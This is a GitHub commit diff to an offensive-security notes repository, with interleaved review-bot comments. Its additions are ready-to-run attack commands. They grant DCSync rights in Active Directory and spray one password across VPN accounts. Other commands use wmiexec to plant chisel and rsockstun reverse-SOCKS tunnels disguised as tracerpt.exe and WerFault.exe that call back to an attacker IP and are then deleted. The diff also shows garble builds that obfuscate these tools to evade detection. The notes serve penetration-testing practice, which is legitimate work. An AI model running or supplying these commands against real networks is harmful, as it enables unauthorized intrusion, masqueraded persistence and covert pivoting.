[AHK] Automatic update 👽
snovvcrash committed Apr 13, 2023
1 parent cc15631 commit 18227a7
Showing 9 changed files with 98 additions and 7 deletions.
1 change: 1 addition & 0 deletions SUMMARY.md
Expand Up @@ -187,6 +187,7 @@
* [Shellcode Runners](redteam/maldev/code-injection/shellcode-runners.md)
- [D/Invoke](redteam/maldev/dinvoke.md)
- [DLL Hijacking](redteam/maldev/dll-hijacking.md)
- [Golang](redteam/maldev/golang.md)
- [Nim](redteam/maldev/nim.md)
- [Sandbox Evasion](redteam/maldev/sandbox-evasion.md)
- [Shellcodes](redteam/maldev/shellcodes.md)
2 changes: 1 addition & 1 deletion pentest/infrastructure/ad/acl-abuse.md
Expand Up @@ -266,7 +266,7 @@ $ ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash --no-sm
Using Impacket **dacledit.py**:

```
$ dacledit.py megacorp.local/snovvcrash:'Passw0rd!' -action write -rights DCSync -principal snovvcrash -targer-dn 'DC=megacorp,DC=local' -dc-ip 192.168.1.11
$ dacledit.py megacorp.local/snovvcrash:'Passw0rd!' -action write -rights DCSync -principal snovvcrash -target-dn 'DC=megacorp,DC=local' -dc-ip 192.168.1.11
```

Using **PowerView2**:
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/gpo-abuse.md
Expand Up @@ -7,6 +7,7 @@ description: Group Policy Objects
* [https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
* [https://wald0.com/?p=179](https://wald0.com/?p=179)
* [https://github.com/EvotecIT/GPOZaurr](https://github.com/EvotecIT/GPOZaurr)
* [https://xakep.ru/2023/02/01/exploiting-gpo/](https://xakep.ru/2023/02/01/exploiting-gpo/)

Force GPO update on all domain computers:

11 changes: 10 additions & 1 deletion pentest/infrastructure/ad/kerberos/README.md
Expand Up @@ -10,7 +10,6 @@
- [https://habr.com/ru/company/tomhunter/blog/509290/](https://habr.com/ru/company/tomhunter/blog/509290/)
- [https://ardent101.github.io/posts/kerberos_theory/](https://ardent101.github.io/posts/kerberos_theory/)
- [https://ardent101.github.io/posts/kerberos_general_attacks/](https://ardent101.github.io/posts/kerberos_general_attacks/)
- [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere)

{% embed url="https://youtu.be/qZPvgoUzCdI" %}

Expand Down Expand Up @@ -64,6 +63,15 @@ python3 keytab.py keytab.kt



## Manual Tickets Injection

- [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere)
- [https://xakep.ru/2023/04/04/no-mimikatz/](https://xakep.ru/2023/04/04/no-mimikatz/)
- [https://github.com/MzHmO/articles/tree/main/Ticket%20Injector](https://github.com/MzHmO/articles/tree/main/Ticket%20Injector)




## Kerberos on Linux

- [https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory)
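Review bot: The new heading `## Manual Tickets Injection` reads better as `## Manual Ticket Injection` (attributive noun in the singular, in line with the other headings in this file such as `## Kerberos on Linux`). The link list itself is fine, and moving the Cerbere link here from the top-level reference list (previous hunk) keeps it next to the two related write-ups.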
Expand Down Expand Up @@ -122,3 +130,4 @@ A blog series by [@n0pe_sled](https://medium.com/@n0pe_sled) on attacking FreeIP
- [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
- [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
- [Attacking FreeIPA — Part IV: CVE-2020–10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
- [https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting](https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting)
13 changes: 10 additions & 3 deletions pentest/infrastructure/ad/lateral-movement/rdp.md
Expand Up @@ -26,6 +26,13 @@ PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1
```

Manually add firewall rule (if necessary):

```
Cmd > netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in protocol=TCP localport=3389 action=allow
PS > New-NetFirewallRule -DisplayName 'Allow Remote Desktop' -Profile @('Domain', 'Private') -Direction Inbound -Action Allow -Protocol TCP -LocalPort @('3389')
```




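Review bot: The two firewall commands in this hunk are not equivalent: the `netsh advfirewall firewall add rule ...` line has no `profile=` argument, so the rule applies to every profile including Public, whereas the `New-NetFirewallRule` line is scoped to `-Profile @('Domain', 'Private')`. Adding `profile=domain,private` to the netsh form keeps the two in step and avoids opening 3389 on the Public profile. Also, `-LocalPort @('3389')` can simply be `-LocalPort 3389`; the array form is only needed for several ports.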
Expand All @@ -39,7 +46,7 @@ PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Ser

RDP with [PtH](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/): RDP needs a plaintext password unless Restricted Admin mode is enabled.

Check / enable / delete with PowerShell:
Check / enable / disable with PowerShell:

```
PS > Get-ChildItem "HKLM:\System\CurrentControlSet\Control\Lsa" -Recurse
Expand All @@ -50,14 +57,14 @@ PS > Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "Disabl
PS > Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin"
```

Check / enable / delete with Impacket:
Check / enable / disable with impacket:

```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -s
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 0
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 1
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 delete -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v DisableRestrictedAdmin
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 delete -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
```

Enable with CME:
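Review bot: Good catch on the last line: the `delete` previously targeted `HKLM\SYSTEM\CurrentControlSet\Control\CrashControl`, which has nothing to do with Restricted Admin mode; it now removes `DisableRestrictedAdmin` under `...\Control\Lsa`, matching the `add` and `query` lines. Two small points: the new `add ... -vd 1` line and the `delete` line both leave Restricted Admin mode disabled (the value set to 1 and the value absent have the same effect, since the mode is off by default), so a short comment on which one to prefer would help the reader; and the lead-in was changed from `Impacket` to lowercase `impacket`, which is inconsistent with `Using Impacket **dacledit.py**` in acl-abuse.md in this same commit.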
3 changes: 3 additions & 0 deletions pentest/infrastructure/ad/lateral-movement/wmi.md
Expand Up @@ -55,6 +55,9 @@ Get-WmiObject -Class Win32_Group | ft -AutoSize

## wmiexec.py

- [https://github.com/XiaoliChan/wmiexec-RegOut](https://github.com/XiaoliChan/wmiexec-RegOut)
- [https://github.com/XiaoliChan/wmiexec-Pro]()

```
$ wmiexec.py -codec cp866 snovvcrash:'Passw0rd!'@192.168.1.11
$ wmiexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 [email protected]
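Review bot: The second bullet, `- [https://github.com/XiaoliChan/wmiexec-Pro]()`, has an empty link target, so it renders as a dead link; the URL should be repeated inside the parentheses the way it is for the `wmiexec-RegOut` bullet above it.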
32 changes: 30 additions & 2 deletions pentest/infrastructure/pivoting.md
Expand Up @@ -282,13 +282,12 @@ Other `xfreerdp` tips:

- [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
- [https://github.com/ginuerzh/gost](https://github.com/ginuerzh/gost)
- [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun)
- [https://github.com/sysdream/ligolo](https://github.com/sysdream/ligolo)
- [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng)



### proxychains-ng
### proxychains4 (proxychains-ng)

* [https://github.com/rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng)

Expand Down Expand Up @@ -322,6 +321,10 @@ $ sshuttle -vr [email protected] 192.168.1.0/24 -e "ssh -i ./key"
- [https://github.com/jpillora/chisel/releases](https://github.com/jpillora/chisel/releases)
- [https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel](https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel)

{% content-ref url="/redteam/maldev/golang.md" %}
[golang.md](golang.md)
{% endcontent-ref %}

{% embed url="https://snovvcrash.github.io/2020/03/17/htb-reddish.html#chisel-socks" caption="HTB Reddish: Chisel SOCKS" %}

* Attacker's IP: `10.10.13.37`
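Review bot: In the new `content-ref` block the inner link `[golang.md](golang.md)` is relative to `pentest/infrastructure/`, where no `golang.md` exists, while the `url` attribute is the absolute `/redteam/maldev/golang.md`. GitBook resolves the block from the `url` attribute, but the plain-markdown rendering on GitHub follows the inner link, so the inner target should also point at `../../redteam/maldev/golang.md` (or the same absolute path) to avoid a broken link.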
Expand Down Expand Up @@ -361,6 +364,14 @@ snovvcrash@kali:~$ ./chisel server -p 8000 --reverse --socks5 [--auth snovvcrash
alice@victim:~$ nohup ./chisel client [--fingerprint <BASE64_STRING>] [--auth snovvcrash:'Passw0rd!'] 10.10.13.37:8000 R:[127.0.0.1:1080:]socks &
```

Quicky:

```
$ wmiexec.py -nooutput megacorp.local/[email protected] 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"'
$ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks
$ wmiexec.py -nooutput megacorp.local/[email protected] 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe'
```


#### Double SOCKS Proxy

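Review bot: `Quicky:` is a typo; `Quick way:` reads better. It would also help to say in the lead-in that this variant is the forward mode (chisel server on the target, client connecting to `192.168.1.11:8000`), as opposed to the `--reverse` setup in the block just above it, so the reader does not mix the two command sets.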
Expand Down Expand Up @@ -398,6 +409,23 @@ alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!'



### rsockstun

- [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun)

{% content-ref url="/redteam/maldev/golang.md" %}
[golang.md](golang.md)
{% endcontent-ref %}

```
$ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes
$ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!'
$ wmiexec.py -nooutput megacorp.local/[email protected] 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"'
$ wmiexec.py -nooutput megacorp.local/[email protected] 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe'
```



### Neo-reGeorg

* [https://github.com/L-codes/Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg)
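Review bot: The `openssl req` line has no `-subj`, so it prompts interactively for the certificate subject fields; adding e.g. `-subj '/CN=localhost'` keeps the sequence non-interactive. The listener line passes `-cert cert` while the files generated on the previous line are `cert.crt` and `cert.key`; please confirm that rsockstun expects the file prefix here rather than a full filename, and say so in a comment. The same `content-ref` remark as for the chisel section applies: the inner `[golang.md](golang.md)` link does not resolve relative to this file. Finally, note that `taskkill /IM:WerFault.exe /F` terminates every process with that image name, including any genuine Windows Error Reporting instances running on the host at the time.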
13 changes: 13 additions & 0 deletions pentest/perimeter/cisco.md
Expand Up @@ -3,6 +3,19 @@



## Brute Force Authentication

- [https://github.com/R3dy/ciscobruter](https://github.com/R3dy/ciscobruter)

Manually in a dirty way:

```
$ for user in `cat users.txt`; do echo 'Passw0rd!' | sudo openconnect vpn.contoso.com --user=$user --passwd-on-stdin --servercert=pin-sha256:<BASE64> | tee -a openconnect.log; done
```




## ASA Path Traversal

**CVE-2020-3452**
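Review bot: The loop tries one password (`Passw0rd!`) against every user in `users.txt`, which is a password spray rather than a brute force, so a heading such as `## Password Spraying` (or a sentence saying so) would describe the section more accurately. Style-wise, `$(cat users.txt)` is preferable to the backtick form, and the `<BASE64>` placeholder in `--servercert=pin-sha256:<BASE64>` deserves a short note on where the value comes from (openconnect prints the expected pin when the server certificate is not trusted).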
29 changes: 29 additions & 0 deletions redteam/maldev/golang.md
@@ -0,0 +1,29 @@
# Golang

- [https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c](https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c)




## Obfuscate Go Tooling



### garble

Example with [chisel](https://github.com/jpillora/chisel):

```
$ go install mvdan.cc/garble@latest
$ go install github.com/jpillora/chisel@latest
$ git clone https://github.com/jpillora/chisel chisel-src && cd chisel-src
$ env CGO_ENABLE=1 GOOS=windows GOARCH=amd64 garble -literals -tiny build -trimpath
```

Example with [rsockstun](https://github.com/llkat/rsockstun):

```
$ git clone https://github.com/llkat/rsockstun rsockstun-src && cd rsockstun-src
$ go mod init rsockstun && go mod tidy
$ env CGO_ENABLE=1 GOOS=windows GOARCH=amd64 garble -literals -tiny build -trimpath
```
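Review bot: `CGO_ENABLE=1` in both `garble` lines is not a variable Go reads; the correct name is `CGO_ENABLED`, so as written the setting has no effect (and since chisel and rsockstun are pure-Go tools, `CGO_ENABLED=0` is probably what is wanted when cross-compiling to `GOOS=windows`, avoiding any need for a Windows-targeting C toolchain). In the chisel example the `go install github.com/jpillora/chisel@latest` line is not used by the later `garble ... build` of the cloned source and can be dropped. `-trimpath` is a build flag, so `garble -literals -tiny build -trimpath` is correctly ordered.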

0 comments on commit 18227a7